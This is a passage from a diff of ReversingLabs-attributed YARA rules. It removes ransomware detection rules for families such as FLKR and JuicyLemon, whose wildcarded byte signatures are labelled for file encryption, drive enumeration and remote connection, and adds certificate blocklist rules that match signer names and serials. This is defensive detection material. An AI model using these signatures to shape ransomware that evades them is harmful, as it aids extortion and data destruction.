-            ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 0B C0 74 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF
-            75 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? DF 6D ?? DA 45
-            ?? DF 7D ?? C7 45 ?? ?? ?? ?? ?? DF 6D ?? DA 65 ?? DF 7D ?? C7 45 ?? ?? ?? ?? ?? DF
-            6D ?? DA 65 ?? DF 7D ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 74 ?? E9 ?? ?? ?? ?? 8F 45 ??
-            8F 45 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ??
-            ?? ?? 0B C0 74 ?? EB ?? 6A ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ??
-            ?? 0B C0 75 ?? EB ?? 6A ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
-            ?? 0B C0 75 ?? EB ?? EB ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 FF 75 ?? FF 15 ?? ??
-            ?? ?? FF 75 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ??
-            50 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5B C9 C2
-        }
-		$read_config_file = {
-            55 8B EC 83 C4 ?? [0-20] 6A ?? 68 ?? ?? ?? ?? 6A
-            ?? (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 ?? 33 C0 C9
-            C3 89 45 ?? 50 6A ?? (E8 | FF 15) ?? ?? ?? ?? 0B
-            C0 75 04 33 C0 C9 C3 89 45 ?? FF 75 ?? 6A ??
-            (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3
-            89 45 ?? 50 (E8 | FF 15) ?? ?? ?? ?? 0B C0 75 04
-            33 C0 C9 C3 89 45 ?? FF 75 ?? 6A ?? (E8 | FF 15)
-            ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 8B
-            D8 FF 75 ?? FF 75 ?? FF 75 ?? (E8 | FF 15) ?? ??
-            ?? ?? FF 75 ?? (E8 | FF 15) ?? ?? ?? ?? 8B 5D ??
-            6A ?? 53 68 ?? ?? ?? ?? (E8 | FF 15) ?? ?? ?? ??
-            83 C3 ?? 8B 45 ?? 83 (E8 | FF 15) ?? 50 53
-            (E8 | FF 15) ?? ?? ?? ?? 8A 03 A2 ?? ?? ?? ?? 83
-            C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3
-        }
-		$file_type_loop = {
-            51 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8
-            ?? 75 03 59 EB ?? 53 E8 ?? ?? ?? ?? 03 D8 83 C3
-            ?? 59 E2 DC [20-40] FF B5 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 0B C0 75 44 FF B5 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85
-        }
-		$encrypt_routine = {
-            FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
-            [0-10] E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ??
-            FF (35 | 75) [1-4] FF 75 ?? (E8 | FF 15)
-            ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? [1-10] FF (35 | 75) [1-4] 6A ??
-            6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15) ??
-            ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ??
-            [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8
-            ?? 75 ?? [10-40] FF (35 | 75) [1-4] FF 75 ??
-            (E8 |FF 15)
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $read_config_file and $file_type_loop and $encrypt_routine ) or ( $enum_drives and $enum_shared_resources and $find_files and $encrypt_files ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UPLagga Systems s.r.o." and ( pe.signatures [ i ] . serial == "00:92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" or pe.signatures [ i ] . serial == "92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" ) and 1598054400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_FLKR : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_B8164F7143E1A313003Ab0C834562F1F : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects FLKR ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7f3abcd0-8dfa-5914-9ad0-566c16c2e2ab"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "50d50330-4098-59dd-b2da-0714eefdfc66"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.FLKR.yara#L1-L71"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4ab00ba82baceec9899556d3a774ec08c83c10930cec194e18e3b4e16ebacb58"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11142-L11160"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a42fec2e0e8d37948420f16907f39c3d502c535be98024d04a777dfbc633004d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "FLKR"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_and_encrypt_p1 = {
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 8B BC 24 ??
-            ?? ?? ?? 57 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 89 44
-            24 ?? FF D5 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 51 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 54 24 ?? 52 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8D 4C 24 ?? 51
-            57 C6 04 07 ?? FF D5 F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 84
-            C0 0F 85 ?? ?? ?? ?? 8A 0F 33 D2 84 C9 74 ?? BE ?? ?? ?? ?? 8B C7 2B F7 88 0C 06 8A
-            48 ?? 40 42 84 C9 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 82 ?? ?? ?? ?? ?? C6 82 ??
-            ?? ?? ?? ?? FF D5 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6
-            74 ?? 56 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 68 ?? ?? ?? ?? 57 FF D5 57 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 38 44 24 ?? 74
-        }
-		$search_and_encrypt_p2 = {
-            40 80 7C 04 ?? ?? 75 ?? 8A 4C 04 ?? 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ?? 80 7C 04 ??
-            ?? 75 ?? 80 7C 04 ?? ?? 74 ?? 80 F9 ?? 75 ?? B3 ?? 38 5C 04 ?? 75 ?? 80 7C 04 ?? ??
-            75 ?? 80 7C 04 ?? ?? 75 ?? 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 05 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? FF 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? B3 ?? B2 ?? 80 F9 ?? 75 ?? 38 5C 04 ?? 75
-            ?? 80 7C 04 ?? ?? 75 ?? 38 5C 04 ?? 75 ?? 32 D2 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ??
-            80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? ?? 75 ?? 32 D2 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ??
-            80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? ?? 0F 84 ?? ?? ?? ?? 84 D2 0F 84 ?? ?? ?? ?? 8A 0F
-            33 D2 84 C9 74 ?? 8D B4 24 ?? ?? ?? ?? 8B C7 2B F7 8D A4 24 ?? ?? ?? ?? 88 0C 06 8A
-            48 ?? 40 42 84 C9 75 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 0F B6
-            05 ?? ?? ?? ?? C6 84 14 ?? ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 8B 15
-            ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 33 C0 6A ?? 89 8C 24 ?? ?? ?? ?? 89 94 24 ?? ?? ??
-            ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 68 ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 0D ??
-            ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B E8 A1 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 8B 0D ?? ?? ??
-            ?? 89 84 24 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 66 8B 15 ?? ?? ??
-            ?? 89 8C 24 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 8D 74 24 ?? 89 6C 24 ?? 66 89
-        }
-		$search_and_encrypt_p3 = {
-            94 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ??
-            52 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51
-            E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 56
-            68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50
-            8D 84 24 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A
-            ?? 51 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 56 E8 ?? ?? ?? ?? 8B 7C 24 ?? 83 C4 ?? FF 05 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52
-            FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 2B F0 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 03
-            C6 50 8D 8C 24 ?? ?? ?? ?? 51 8B D1 52 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? FF 05 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 55 E8 ?? ??
-            ?? ?? 8B 2D ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? 8D 4C 24 ?? 51 56 FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 56 FF 15
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $search_and_encrypt_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ekitai Data Inc." and ( pe.signatures [ i ] . serial == "00:b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" or pe.signatures [ i ] . serial == "b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" ) and 1598313600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Juicylemon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects JuicyLemon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "35e4bbd6-422b-562e-98fc-fe932270dbb8"
-		date = "2020-08-17"
-		modified = "2020-08-17"
+		id = "8e533ebf-a124-53a9-8647-6f4b40aaa066"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.JuicyLemon.yara#L1-L116"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "596d89843793307f4940dbb85b2e7081f02250f6adfdcd01f2d3c5f2b8b90875"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11162-L11178"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "861691ce7bae4366f3b35d01c84bb0031b54653869f52eaccf20808b1b55d2af"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "JuicyLemon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_1 = {
-            55 8B EC 83 C4 ?? 53 56 57 89 4D ?? 8B FA 8B F0 C6 45 ?? ?? 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? FF 15 ?? ?? ?? ?? 8B D8 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 57 56 53 FF 15 ?? ?? ??
-            ?? 8B F0 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 56 FF 15
-            ?? ?? ?? ?? 8B F8 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? C6 45 ?? ?? 57 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 53
-            FF 15 ?? ?? ?? ?? 8A 45 ?? 5F 5E 5B 59 59 5D C2
-        }
-		$remote_connection_2 = {
-            55 8B EC 33 C9 51 51 51 51 51 51 51 53 56 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 DB 8D 55 ?? 8B
-            45 ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 66 BE ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 66 BE ?? ?? 8D 45 ?? E8
-            ?? ?? ?? ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D6
-            59 E8 ?? ?? ?? ?? 84 C0 74 ?? B3 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$find_files_and_encrypt = {
-            E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 88 45 ?? 46 4B 75 ?? A1 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 75 ?? 80 7D ?? ?? 75 ?? 8B 5D ?? 4B 85 DB 7C ?? 43 33 F6 8D 85
-            ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8
-            ?? ?? ?? ?? 46 4B 75 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 57
-            A1 ?? ?? ?? ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 85 DB 74
-            ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 EB ?? B3 ?? 8D 85 ?? ?? ?? ?? 8B D3 80 C2 ?? E8
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 8B 00 FF
-            D0 83 F8 ?? 76 ?? 83 F8 ?? 74 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 85 ??
-            ?? ?? ?? 8B D3 80 C2 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 FF 05 ??
-            ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 8D 46 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 4B 80 FB ?? 0F 85 ?? ?? ?? ?? 57 A1 ?? ?? ??
-            ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 85 DB 74 ?? 6A ?? A1
-            ?? ?? ?? ?? 8B 00 FF D0 EB ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 46 ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 A1 ?? ?? ?? ?? 8B 00 FF D0 FF 05 ?? ?? ?? ?? 57 A1 ??
-            ?? ?? ?? 8B 00 FF D0 8D 46 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? A1 ??
-            ?? ?? ?? 8B 00 FF D0 57 A1 ?? ?? ?? ?? 8B 00 FF D0 8B 1D ?? ?? ?? ?? 57 A1 ?? ?? ??
-            ?? 8B 00 FF D0 85 DB 74 ?? 6A ?? A1 ?? ?? ?? ?? 8B 00 FF D0 EB ?? A1 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            52 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 50 B8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 5A 59 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? C6 45 ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 8B
-            5D ?? 4B 85 DB 7C ?? 43 33 F6 80 7D ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ??
-            8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ??
-            ?? ?? 8B 15 ?? ?? ?? ?? 8B 14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
-            ?? ?? 88 45 ?? 46 4B 75 ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? 80 7D
-            ?? ?? 75 ?? 8B 5D ?? 4B 85 DB 7C ?? 43 33 F6 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B
-            14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 46 4B 75 ?? BA ?? ??
-            ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B C8 B8 ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? BA ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 B8 ?? ?? ??
-            ?? 5A E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? FF 35 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? A1
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ??
-            E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
